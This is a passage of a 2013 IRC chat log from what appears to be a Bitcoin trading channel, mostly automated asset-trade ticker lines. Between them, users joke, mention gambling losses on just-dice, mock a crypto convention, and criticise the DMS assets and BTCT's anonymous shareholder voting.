if you just do me a small favor" Jun 24 02:42:29 other people that made bade choices will rally behind you Jun 24 02:42:31 [BTCTC] [TAT.ASICMINER] 13 @ 0.0327 = 0.4251 BTC [+] Jun 24 02:42:45 you'll look right no matter what Jun 24 02:42:46 ThickAsThieves a little jaded are we. Jun 24 02:42:52 a little Jun 24 02:42:58 "i'll ask you a question during the dinner and you'll just have to answer x^3/3" Jun 24 02:43:03 i'm not good with getting trolled Jun 24 02:43:08 the waitress is like "mmkay sure" Jun 24 02:43:19 so his friend shows up, dinner starts Jun 24 02:43:40 the first guy is like "see buddy, this place i'm taking you is really special" Jun 24 02:44:06 "all the staff has extensive scientific and mathematic knowledge and are very educated people" Jun 24 02:44:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0327 BTC [+] Jun 24 02:44:33 he's like "you don't believe me? check this out" Jun 24 02:44:43 proceeds to call the waitress and asks her : Jun 24 02:44:53 this so far sounds like the mit campus. Jun 24 02:44:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.0327 = 0.1635 BTC [+] Jun 24 02:45:08 "young lady, what's the integral of x^2 ?" Jun 24 02:45:29 the waitress answers as expected : "well, that would be x^3/3" Jun 24 02:45:56 the friend is quite impressed and thanks the waitress Jun 24 02:46:03 she goes to move along Jun 24 02:46:23 she turns around while walking away Jun 24 02:46:29 and adds : "plus a constant" Jun 24 02:46:37 lol Jun 24 02:46:49 +c Jun 24 02:46:51 ahaha Jun 24 02:47:56 but srsly, around kendall i was all like "i won't be served by anyone w/o a phd" Jun 24 02:47:56 and here I was expecting $20 Jun 24 02:48:39 [BTCTC] [DMS.MINING] 1 @ 0.0188 BTC [+] Jun 24 02:51:11 [BTCTC] [ASICMINER-PT] 1 @ 3.279999 BTC [-] Jun 24 02:51:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.0327 = 0.1308 BTC [+] Jun 24 02:51:32 [HAVELOCK] [ASICM] 1 @ 0.03179999 BTC [+] Jun 24 02:51:59 [MPEX] [S.MPOE] 1834 @ 0.00078986 = 1.4486 BTC [-] Jun 24 02:52:01 [MPEX] [S.MPOE] 7466 @ 0.00078882 = 5.8893 BTC [-] Jun 24 02:53:36 [BTCTC] [ASICMINER-PT] 1 @ 3.28 BTC [+] Jun 24 02:54:27 [BTCTC] [ASICMINER-PT] 1 @ 3.289969 BTC [+] Jun 24 02:55:34 and one for the masses.... Jun 24 02:55:37 You build a dozen roads, but do they call you Connor the road-builder? No. You sire six wonderful sons, but do they call you Connor the child-rearer? No. But you fuck one sheep... Jun 24 02:56:20 and they call you barney frank ? Jun 24 02:56:32 [BTCTC] [TAT.ASICMINER] 68 @ 0.0327 = 2.2236 BTC [+] Jun 24 02:57:24 had to look that one up Jun 24 02:57:28 [BTCTC] [BASIC-MINING] 1 @ 1.011112 BTC [-] Jun 24 02:57:29 [BTCTC] [BASIC-MINING] 1 @ 1.011111 BTC [-] Jun 24 02:57:30 [BTCTC] [BASIC-MINING] 1 @ 1.01 BTC [-] Jun 24 02:57:32 [BTCTC] [BASIC-MINING] 1 @ 1 BTC [-] Jun 24 02:57:48 [BTCTC] [GSDPT] 5 @ 0.00249 = 0.0125 BTC [+] Jun 24 02:57:59 [BTCTC] [ASICMINER-PT] 1 @ 3.2937 BTC [+] Jun 24 02:58:54 [BTCTC] [ASICMINER-PT] 1 @ 3.29969 BTC [+] Jun 24 02:59:19 [BTCTC] [S.MPOE-PT] 5 @ 0.000777 = 0.0039 BTC [-] Jun 24 02:59:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0327 BTC [+] Jun 24 02:59:30 I should really pay more attention to 'merican politics Jun 24 03:03:15 [BTCTC] [ASICMINER-PT] 1 @ 3.299 BTC [-] Jun 24 03:04:31 "They laughed when I said I was going to be a comedian. Well, they’re not laughing now!" Jun 24 03:07:54 "Well, it aint exactly rocket surgery..." Jun 24 03:08:41 verrückt Jun 24 03:08:54 seems like you lost a Yes vote Furuk Jun 24 03:08:58 :/ Jun 24 03:09:16 and now AM is selling USBminers for 1btc Jun 24 03:09:24 hard out there for a pimp Jun 24 03:09:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.0327 = 0.0654 BTC [+] Jun 24 03:15:37 Jesus MattFoster just lost $10,000 Jun 24 03:15:52 on just-dice Jun 24 03:22:03 [MPEX] [S.MPOE] 1000 @ 0.00079026 = 0.7903 BTC [+] Jun 24 03:22:04 no, like 90 btc Jun 24 03:22:09 a fate infinitely worse. Jun 24 03:23:33 Bug, are you addicted to gambling now? Jun 24 03:23:36 or just invested? Jun 24 03:24:36 [BTCTC] [B.YABMC] 1 @ 0.00548 BTC [+] Jun 24 03:25:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003773 BTC [-] Jun 24 03:26:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.0327 = 1.635 BTC [+] Jun 24 03:30:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0327 BTC [+] Jun 24 03:31:32 [BTCTC] [DMS.SELLING] 2 @ 0.0409 = 0.0818 BTC [+] Jun 24 03:36:24 [HAVELOCK] [ASICM] 50 @ 0.0309 = 1.545 BTC [-] Jun 24 03:36:24 [HAVELOCK] [ASICM] 47 @ 0.0309 = 1.4523 BTC [-] Jun 24 03:39:41 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1995 = 1.995 BTC [-] Jun 24 03:40:40 [BTCTC] [CRYPTO-TRADE] 8 @ 0.199 = 1.592 BTC [-] Jun 24 03:42:32 I might be invested Jun 24 03:42:39 I might not Jun 24 03:42:48 I am interested in the site though Jun 24 03:42:53 I think it is really well done Jun 24 03:43:14 it's pretty cool Jun 24 03:43:34 would like to see a better design Jun 24 03:43:38 but that's me Jun 24 03:44:40 Which site is that? Jun 24 03:44:54 [BTCTC] [DMS.PURCHASE] 30 @ 0.054062 = 1.6219 BTC [-] Jun 24 03:45:31 just-dice.com Jun 24 03:45:42 all the cool kids are doing it Jun 24 03:46:19 yes just press and hold L Jun 24 03:46:27 very very fun Jun 24 03:46:40 And they're listed somewhere? Jun 24 03:47:16 nope Jun 24 03:47:24 but you can invest in the bankroll directly Jun 24 03:47:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.0327 = 0.1308 BTC [+] Jun 24 03:47:25 [BTCTC] [TAT.ASICMINER] 196 @ 0.0328 = 6.4288 BTC [+] Jun 24 03:47:35 crowdsourced bankroll Jun 24 03:47:38 Ah... Jun 24 03:47:39 up to 6,000BTC. Jun 24 03:47:46 in 4 days of investment Jun 24 03:48:05 Go on... Jun 24 03:49:39 just go to the site and check it out if you want to bet Jun 24 03:49:47 I don't recommend investing though Jun 24 03:49:51 [BTCTC] [BASIC-MINING] 1 @ 0.950001 BTC [-] Jun 24 03:49:52 [BTCTC] [BASIC-MINING] 5 @ 0.95 = 4.75 BTC [-] Jun 24 03:49:54 [BTCTC] [BASIC-MINING] 2 @ 0.888888 = 1.7778 BTC [-] Jun 24 03:49:55 [BTCTC] [BASIC-MINING] 5 @ 0.888004 = 4.44 BTC [-] Jun 24 03:50:05 Not much use when your stake is so dilute Jun 24 03:50:36 said the investor Jun 24 03:50:44 ;) Jun 24 03:50:56 [MPEX] [S.MPOE] 7715 @ 0.00079026 = 6.0969 BTC [+] Jun 24 03:53:43 Will the 94995 ask get hit? Jun 24 03:54:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0328 = 0.0656 BTC [+] Jun 24 04:04:28 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003649 = 0.1825 BTC [-] Jun 24 04:04:42 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003313 = 0.0066 BTC [-] Jun 24 04:10:24 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00339 = 0.0271 BTC [+] Jun 24 04:11:10 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.00339 = 0.1356 BTC [+] Jun 24 04:12:07 ;;tslb Jun 24 04:13:11 Error: Problem retrieving latest block data. Jun 24 04:13:30 .tslb Jun 24 04:13:31 3.67 minutes Jun 24 04:13:34 hm Jun 24 04:13:43 ozbot saving the day Jun 24 04:14:47 [BTCTC] [PAJKA.BOND] 1 @ 0.049014 BTC [-] Jun 24 04:15:42 http://imgur.com/gallery/GmhSS1L Jun 24 04:15:44 Note found in a product from China: - Imgur Jun 24 04:17:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.0328 = 0.0984 BTC [+] Jun 24 04:17:53 lol Jun 24 04:20:14 [BTCTC] [ASICMINER-PT] 1 @ 3.299 BTC [-] Jun 24 04:20:55 [BTCTC] [PAJKA.BOND] 1 @ 0.04925 BTC [+] Jun 24 04:20:57 [BTCTC] [PAJKA.BOND] 1 @ 0.0495 BTC [+] Jun 24 04:21:21 poor falung gong Jun 24 04:21:33 the worst part is that it's so fucking stupid Jun 24 04:21:45 what I don't understand is why they can't just yogic fly away Jun 24 04:21:50 "o, we're persecuted because we don't believe in bearded skyguy, there's a moustachey skyguy there!!!" Jun 24 04:22:01 im like dude... Jun 24 04:22:56 [BTCTC] [COGNITIVE] 1 @ 0.331 BTC [+] Jun 24 04:22:56 ;;google yogic flight Jun 24 04:22:58 Yogic Flying - really cool! - YouTube: ; Yogic Flying - YouTube: ; Yogic Flying Demo October 2003 - Maharishi Mahesh Yogi - YouTube: Jun 24 04:23:51 wait, it's a thing ?! Jun 24 04:23:54 god. Jun 24 04:24:45 yes its a thing Jun 24 04:29:54 [BTCTC] [ASICMINER-PT] 2 @ 3.299998 = 6.6 BTC [+] Jun 24 04:30:00 [BTCTC] [S.MPOE-PT] 1 @ 0.000777 BTC [-] Jun 24 04:31:11 [BTCTC] [TAT.ASICMINER] 18 @ 0.0328 = 0.5904 BTC [+] Jun 24 04:32:31 [BTCTC] [TAT.ASICMINER] 22 @ 0.03288 = 0.7234 BTC [+] Jun 24 04:36:47 [BTCTC] [ASICMINER-PT] 4 @ 3.299997 = 13.2 BTC [-] Jun 24 04:36:49 [BTCTC] [ASICMINER-PT] 4 @ 3.299998 = 13.2 BTC [+] Jun 24 04:36:52 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [+] Jun 24 04:36:52 [BTCTC] [ASICMINER-PT] 2 @ 3.309 = 6.618 BTC [+] Jun 24 04:36:54 [BTCTC] [ASICMINER-PT] 1 @ 3.31 BTC [+] Jun 24 04:37:25 [BTCTC] [TAT.ASICMINER] 78 @ 0.03288 = 2.5646 BTC [+] Jun 24 04:45:40 [BTCTC] [PAJKA.BOND] 1 @ 0.049 BTC [-] Jun 24 04:46:41 [BTCTC] [ASICMINER-PT] 1 @ 3.318999 BTC [+] Jun 24 04:46:50 [BTCTC] [PAJKA.BOND] 1 @ 0.0485 BTC [-] Jun 24 04:46:57 [BTCTC] [ASICMINER-PT] 1 @ 3.319 BTC [+] Jun 24 04:47:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0329 BTC [+] Jun 24 04:48:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.0329 = 0.1316 BTC [+] Jun 24 04:53:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.0329 = 0.1974 BTC [+] Jun 24 04:53:49 [BTCTC] [PAJKA.BOND] 2 @ 0.0485 = 0.097 BTC [-] Jun 24 04:55:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0329 BTC [+] Jun 24 04:55:44 [BTCTC] [PAJKA.BOND] 6 @ 0.0485 = 0.291 BTC [-] Jun 24 04:56:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0329 = 0.329 BTC [+] Jun 24 04:57:05 [MPEX] [S.MPOE] 85 @ 0.00079173 = 0.0673 BTC [+] Jun 24 04:57:07 [MPEX] [S.MPOE] 2300 @ 0.00078829 = 1.8131 BTC [-] Jun 24 04:57:08 [MPEX] [S.MPOE] 2592 @ 0.00078882 = 2.0446 BTC [+] Jun 24 04:57:09 [BTCTC] [TAT.ASICMINER] 9 @ 0.0329 = 0.2961 BTC [+] Jun 24 04:59:43 [HAVELOCK] [ASICM] 47 @ 0.03179899 = 1.4946 BTC [+] Jun 24 05:01:29 [HAVELOCK] [ASICM] 59 @ 0.03179999 = 1.8762 BTC [+] Jun 24 05:01:36 [BTCTC] [ASICMINER-PT] 1 @ 3.324 BTC [+] Jun 24 05:01:38 [BTCTC] [ASICMINER-PT] 2 @ 3.325 = 6.65 BTC [+] Jun 24 05:01:39 [BTCTC] [ASICMINER-PT] 3 @ 3.33 = 9.99 BTC [+] Jun 24 05:01:41 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [+] Jun 24 05:01:41 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Jun 24 05:01:43 [BTCTC] [ASICMINER-PT] 1 @ 3.392 BTC [+] Jun 24 05:01:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.0329 = 0.0987 BTC [+] Jun 24 05:01:57 [BTCTC] [TAT.ASICMINER] 18 @ 0.0329 = 0.5922 BTC [+] Jun 24 05:02:07 [HAVELOCK] [ASICM] 14 @ 0.0318 = 0.4452 BTC [+] Jun 24 05:02:19 [BTCTC] [ASICMINER-PT] 1 @ 3.391 BTC [-] Jun 24 05:02:50 [BTCTC] [DMS.PURCHASE] 10 @ 0.054062 = 0.5406 BTC [-] Jun 24 05:03:00 [HAVELOCK] [ASICM] 132 @ 0.0318 = 4.1976 BTC [+] Jun 24 05:03:01 [BTCTC] [ASICMINER-PT] 1 @ 3.391 BTC [-] Jun 24 05:03:01 [BTCTC] [S.MPOE-PT] 3 @ 0.000777 = 0.0023 BTC [-] Jun 24 05:03:49 [BTCTC] [ASICMINER-PT] 1 @ 3.392 BTC [+] Jun 24 05:05:33 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 24 05:07:42 [HAVELOCK] [ASICM] 8 @ 0.031875 = 0.255 BTC [+] Jun 24 05:08:09 [HAVELOCK] [ASICM] 100 @ 0.032 = 3.2 BTC [+] Jun 24 05:08:32 [BTCTC] [ASICMINER-PT] 1 @ 3.391 BTC [-] Jun 24 05:08:37 [HAVELOCK] [ASICM] 2 @ 0.032 = 0.064 BTC [+] Jun 24 05:08:41 [BTCTC] [TAT.ASICMINER] 46 @ 0.0329 = 1.5134 BTC [+] Jun 24 05:12:43 [HAVELOCK] [ASICM] 75 @ 0.0318 = 2.385 BTC [-] Jun 24 05:13:29 [BTCTC] [TAT.ASICMINER] 60 @ 0.033 = 1.98 BTC [+] Jun 24 05:14:54 [BTCTC] [GSDPT] 1 @ 0.00249 BTC [+] Jun 24 05:15:07 [BTCTC] [TAT.ASICMINER] 77 @ 0.03295 = 2.5372 BTC [-] Jun 24 05:15:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.033 = 0.132 BTC [+] Jun 24 05:15:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.033 = 0.165 BTC [+] Jun 24 05:17:10 [BTCTC] [TAT.ASICMINER] 73 @ 0.033 = 2.409 BTC [+] Jun 24 05:24:11 [HAVELOCK] [ASICM] 8 @ 0.03180001 = 0.2544 BTC [+] Jun 24 05:24:24 [HAVELOCK] [ASICM] 226 @ 0.0318 = 7.1868 BTC [-] Jun 24 05:24:25 [HAVELOCK] [ASICM] 1 @ 0.0318 BTC [-] Jun 24 05:28:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.033297 = 0.8324 BTC [+] Jun 24 05:28:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.033298 = 0.1998 BTC [+] Jun 24 05:29:01 [BTCTC] [GSDPT] 2 @ 0.00249 = 0.005 BTC [+] Jun 24 05:31:16 [BTCTC] [S.MPOE-PT] 2 @ 0.000777 = 0.0016 BTC [-] Jun 24 05:34:40 [MPEX] [S.MPOE] 12369 @ 0.00078783 = 9.7447 BTC [-] Jun 24 05:35:19 [BTCTC] [S.MPOE-PT] 3 @ 0.000777 = 0.0023 BTC [-] Jun 24 05:35:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.033298 = 0.1998 BTC [+] Jun 24 05:37:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.03332 = 0.2332 BTC [+] Jun 24 05:37:42 [BTCTC] [TAT.ASICMINER] 20 @ 0.03333 = 0.6666 BTC [+] **** BEGIN LOGGING AT Mon Jun 24 15:04:36 2013 Jun 24 15:04:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.034878 = 0.0698 BTC [-] Jun 24 15:07:18 http://www.cryptocurrencycon.com/ Jun 24 15:07:28 starring everyone you've never heard of Jun 24 15:07:47 hence the "con"? Jun 24 15:07:48 lol Jun 24 15:08:14 who told the noobs the way to matter is to hold a con ? Jun 24 15:08:19 seriously now. so fucking wrong. Jun 24 15:08:30 imagine in LA all the newcomers held a Movies Convention Jun 24 15:08:31 actually I know Tucker and Kinsella. but not for their Bitcoin work Jun 24 15:08:32 likely it's a pitck-fest Jun 24 15:08:32 FIRST IN LA Jun 24 15:08:44 pitch-fest* Jun 24 15:08:47 and there'd be like... nobody going Jun 24 15:08:55 except a bunch of waitresses etc Jun 24 15:08:55 first they tell you how great everything is Jun 24 15:09:00 then they sell you something Jun 24 15:09:06 and then the next day they'd be all like... ooooo, we made so much business!!!1 Jun 24 15:09:58 from what I see, their aim is to promote bitcoin - it does not seem targeted at current bitcoin users, and not technical either Jun 24 15:10:15 uh… $180 Jun 24 15:10:22 we already have a foundation for that :-) Jun 24 15:10:22 their aim is to charge$18 Jun 24 15:10:24 that won't work Jun 24 15:10:27 $180* Jun 24 15:10:51 unless their target is rich people who want to invest in bitcoins ;) Jun 24 15:11:30 their target is "oh we're unemployed what to do now" Jun 24 15:11:57 [BTCTC] [TAT.ASICMINER] 18 @ 0.034879 = 0.6278 BTC [+] Jun 24 15:11:58 it's so close to me though Jun 24 15:12:09 but to have to drive there and then pay to get in Jun 24 15:12:10 there's no usual student/unemployed discount Jun 24 15:12:11 ... Jun 24 15:13:53 maybe i could be a presenter Jun 24 15:13:59 and get in free Jun 24 15:16:29 "Join us at The Twelve, Atlanta’s most upscale, post-industrial hideaway in the commercial district of Atlantic Station" Jun 24 15:16:40 "$155 plus tax" per night. and it's with a promo code Jun 24 15:17:04 this is your opportunity to sell a lot of TAT investments ;) Jun 24 15:17:24 lol you are probly so right Jun 24 15:19:26 pff Jun 24 15:26:36 http://trilema.com/2013/in-re-noobs-and-conventions/ Jun 24 15:26:39 In re noobs and conventions pe Trilema - Un blog de Mircea Popescu. Jun 24 15:28:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.034879 = 0.1046 BTC [+] Jun 24 15:32:35 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0036 = 0.108 BTC [+] Jun 24 15:32:37 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003553 = 0.0071 BTC [-] Jun 24 15:32:39 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003552 = 0.1066 BTC [-] Jun 24 15:32:39 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003511 = 0.0351 BTC [-] Jun 24 15:32:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003506 BTC [-] Jun 24 15:32:42 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003482 = 0.0209 BTC [-] Jun 24 15:32:43 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003481 = 0.3481 BTC [-] Jun 24 15:34:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.034879 BTC [+] Jun 24 15:35:05 hey, you cited me. I want royalties Jun 24 15:35:28 [BTCTC] [ASICMINER-PT] 1 @ 3.441001 BTC [-] Jun 24 15:35:36 ok. Jun 24 15:35:58 isn't being cited payment enough? Jun 24 15:36:00 Jun 24 15:36:32 [HAVELOCK] [ASICM] 8 @ 0.03390001 = 0.2712 BTC [+] Jun 24 15:36:33 [HAVELOCK] [ASICM] 10 @ 0.0339 = 0.339 BTC [-] Jun 24 15:36:35 [HAVELOCK] [ASICM] 40 @ 0.0339 = 1.356 BTC [-] Jun 24 15:36:56 Ƀ **** BEGIN LOGGING AT Mon Jun 24 15:41:06 2013 Jun 24 15:41:06 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Jun 24 15:41:17 ;;gribblelag Jun 24 15:41:23 lol Jun 24 15:41:40 Error: "gribblelag" is not a valid command. Jun 24 15:42:15 nanotube ^^^ should add it :DDD Jun 24 15:42:39 ;;goxlag Jun 24 15:43:12 Error: Problem retrieving gox lag. Try again later. Jun 24 15:43:48 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0031 = 0.0124 BTC [-] Jun 24 15:43:49 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.0031 = 0.248 BTC [-] Jun 24 15:43:51 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0031 = 0.062 BTC [-] Jun 24 15:43:52 [BTCTC] [TAT.VIRTUALMINE] 178 @ 0.00307 = 0.5465 BTC [-] Jun 24 15:43:53 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003007 = 0.015 BTC [-] Jun 24 15:43:55 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003 = 0.15 BTC [-] Jun 24 15:44:09 ;;nethash Jun 24 15:44:14 lol panic selloff Jun 24 15:44:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0026 BTC [-] Jun 24 15:44:30 when is a sell-off not a panic sell-off? Jun 24 15:44:33 ptchfork mob, i told ya Jun 24 15:44:38 *pitchfork Jun 24 15:44:50 when the bids are thick Jun 24 15:44:55 148614.252356 Jun 24 15:45:12 saulimus: when the panic is carefully premeditated Jun 24 15:45:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.034879 = 0.1395 BTC [+] Jun 24 15:46:26 it's selling below my buyback price Jun 24 15:46:43 so you buying back ? Jun 24 15:46:48 [BTCTC] [TAT.ASICMINER] 26 @ 0.034879 = 0.9069 BTC [+] Jun 24 15:46:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003 BTC [+] Jun 24 15:47:01 hadn't considered it Jun 24 15:47:59 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0028 = 0.14 BTC [-] Jun 24 15:48:01 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0027 = 0.27 BTC [-] Jun 24 15:48:02 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.0027 = 0.108 BTC [-] Jun 24 15:48:13 selling below DMS too Jun 24 15:49:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.034878 BTC [-] Jun 24 15:51:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00241 BTC [-] Jun 24 15:52:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.034878 BTC [-] Jun 24 15:52:58 [HAVELOCK] [ASICM] 3 @ 0.033911 = 0.1017 BTC [+] Jun 24 15:54:31 I still don't understand how DMS works Jun 24 15:54:43 3 assets Jun 24 15:54:59 one allows you to invest into creating the other 2 Jun 24 15:55:12 one of those is a PMB Jun 24 15:55:23 the other is a bet against the PMB Jun 24 15:55:26 oh, *creating*. that's what I was missing I think Jun 24 15:55:45 so you're actually investing in selling a PMB Jun 24 15:55:51 i.e. investing in scamming noobs :p Jun 24 15:55:59 sorta Jun 24 15:56:09 the design allows rapid price discovery Jun 24 15:56:20 so in theory it could drive it down to a reasonable price Jun 24 15:56:34 true Jun 24 15:57:02 [BTCTC] [TAT.ASICMINER] 7 @ 0.034878 = 0.2441 BTC [-] Jun 24 15:57:08 it's interesting nonetheless. I like the innovative financial aspect Jun 24 15:57:15 i'm undecided Jun 24 15:57:20 i appreciate the design Jun 24 15:57:35 but wonder if it is really not worse than a PMB Jun 24 15:57:36 I still won't invest, I don't have time to follow such a complicated thing Jun 24 15:57:54 in a financial market health sense Jun 24 15:58:14 it's a total scheme Jun 24 15:58:28 which one? Jun 24 15:58:35 the DMS set Jun 24 15:59:13 [BTCTC] [TAT.ASICMINER] 30 @ 0.034201 = 1.026 BTC [-] Jun 24 15:59:47 mostly what it accomplishes is a great smokescreen for the issuer Jun 24 16:00:10 as he is likely the one most largely invested in it Jun 24 16:00:20 and has yet to take any of the blowback Jun 24 16:00:34 indeed Jun 24 16:00:49 I wonder how those get approved so easily Jun 24 16:00:59 Deprived has a rep Jun 24 16:01:03 especially with BTCTC Jun 24 16:01:15 [HAVELOCK] [ASICM] 57 @ 0.033911 = 1.9329 BTC [+] Jun 24 16:01:30 he was issuing assets on LTCglobal (the parent of BTCT) before it even existed Jun 24 16:01:53 I know Jun 24 16:01:59 notice he has been mostly silent during the mobs last weekend Jun 24 16:02:02 It was a rhetorical question... :P Jun 24 16:02:28 i find it quite funny how after this weekend, TAT.VM received new No votes Jun 24 16:02:33 on BTCT Jun 24 16:02:39 lol Jun 24 16:02:53 yet DMS.MINING is sitting with 6 positive Jun 24 16:03:07 the critics are so easily fooled Jun 24 16:03:08 [BTCTC] [ASICMINER-PT] 1 @ 3.4739 BTC [+] Jun 24 16:03:11 the whole anonymous voting is very bad Jun 24 16:03:22 the whole voting is bad Jun 24 16:03:29 [HAVELOCK] [HIM] 30 @ 0.265001 = 7.95 BTC [+] Jun 24 16:03:43 like being judged while you sit outside the court Jun 24 16:03:51 usagi said https://btct.co/security/SILVER was Deprived's fault Jun 24 16:04:20 though I doubt it's all his fault… Jun 24 16:04:46 the system is flawed through & through Jun 24 16:04:58 ThickAsThieves: yep Jun 24 16:05:11 it helps no one Jun 24 16:05:12 [MPEX] [S.MPOE] 2702 @ 0.00078564 = 2.1228 BTC [-] Jun 24 16:05:12 [MPEX] [S.MPOE] 3848 @ 0.00078446 = 3.0186 BTC [-] Jun 24 16:05:14 just makes it easier to vote with hidden motives Jun 24 16:05:15 including the exchange Jun 24 16:05:57 if they wanted a voting system, all votes should be justified and no anonymous voting Jun 24 16:06:11 as it is, it's just plain wrong Jun 24 16:06:20 he should just employ real consultants Jun 24 16:06:29 and have a dialog with the applicant Jun 24 16:07:17 that could be nice improvements in the long run Jun 24 16:07:23 but right now Jun 24 16:07:29 scrap anonymous voting Jun 24 16:07:47 and make sure voters justify their positions with good arguments Jun 24 16:07:55 that wouldnt help Jun 24 16:07:59 not coin flips Jun 24 16:08:08 user accounts can be any name Jun 24 16:08:13 and shares xfer'd Jun 24 16:08:23 weekly Jun 24 16:08:28 you'd never know who was who Jun 24 16:08:31 true Jun 24 16:08:47 another really bad oversight Jun 24 16:09:37 you can zoom out further Jun 24 16:09:45 the exchange shouldnt even be public Jun 24 16:09:47 but at least you would know the vote was coming from a sockpuppet Jun 24 16:10:04 [BTCTC] [DMS.MINING] 1 @ 0.0164 BTC [-] Jun 24 16:10:10 why sell 10% of it, and give that portion any power? Jun 24 16:10:37 and you should'nt be able to vote for a month after you've received/bought LTC-Global shares Jun 24 16:11:00 then they'd be even more overpriced Jun 24 16:11:01 hehe Jun 24 16:11:05 yeah Jun 24 16:11:48 these exchanges mostly live to peddle AM these days Jun 24 16:11:57 this is hiding their other faults Jun 24 16:12:04 but they do need to fix this shit Jun 24 16:12:10 indeed they do Jun 24 16:12:14 AM won't pay the bills forever Jun 24 16:12:35 :P Jun 24 16:12:47 [BTCTC] [ASICMINER-PT] 1 @ 3.459 BTC [-] Jun 24 16:13:33 [BTCTC] [COGNITIVE] 1 @ 0.30869 BTC [+] Jun 24 16:14:03 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199001 BTC [-] Jun 24 16:14:56 [BTCTC] [ASICMINER-PT] 5 @ 3.4417 = 17.2085 BTC [-] Jun 24 16:16:05 [BTCTC] [ASICMINER-PT] 1 @ 3.4417 BTC [-] Jun 24 16:17:55 [BTCTC] [ASICMINER-PT] 1 @ 3.4416 BTC [-] Jun 24 16:18:52 [BTCTC] [ASICMINER-PT] 1 @ 3.4416 BTC [-] Jun 24 16:19:13 [BTCTC] [ASICMINER-PT] 1 @ 3.441501 BTC [-] Jun 24 16:19:13 [BTCTC] [ASICMINER-PT] 1 @ 3.441 BTC [-] Jun 24 16:19:33 [BTCTC] [TAT.ASICMINER] 30 @ 0.034877 = 1.0463 BTC [+] Jun 24 16:20:04 [HAVELOCK] [ASICM] 1 @ 0.03447799 BTC [+] Jun 24 16:20:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.034878 = 0.5232 BTC [+] Jun 24 16:21:23 [BTCTC] [ASICMINER-PT] 2 @ 3.415002 = 6.83 BTC [-] Jun 24 16:22:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.03488 = 0.1046 BTC [+] Jun 24 16:22:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.034878 = 0.0698 BTC [-] Jun 24 16:22:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00328 BTC [+] Jun 24 16:23:00 [BTCTC] [ASICMINER-PT] 1 @ 3.415001 BTC [-] Jun 24 16:23:02 [BTCTC] [ASICMINER-PT] 1 @ 3.415 BTC [-] Jun 24 16:23:04 [BTCTC] [ASICMINER-PT] 4 @ 3.4002 = 13.6008 BTC [-] Jun 24 16:23:26 [BTCTC] [TAT.ASICMINER] 30 @ 0.0347 = 1.041 BTC [-] Jun 24 16:24:05 [BTCTC] [TAT.ASICMINER] 20 @ 0.034201 = 0.684 BTC [-] Jun 24 16:24:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.034201 = 0.684 BTC [-] Jun 24 16:24:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [-] Jun 24 16:24:10 [BTCTC] [TAT.ASICMINER] 32 @ 0.034031 = 1.089 BTC [-] Jun 24 16:24:12 [BTCTC] [TAT.ASICMINER] 45 @ 0.03403 = 1.5314 BTC [-] Jun 24 16:25:23 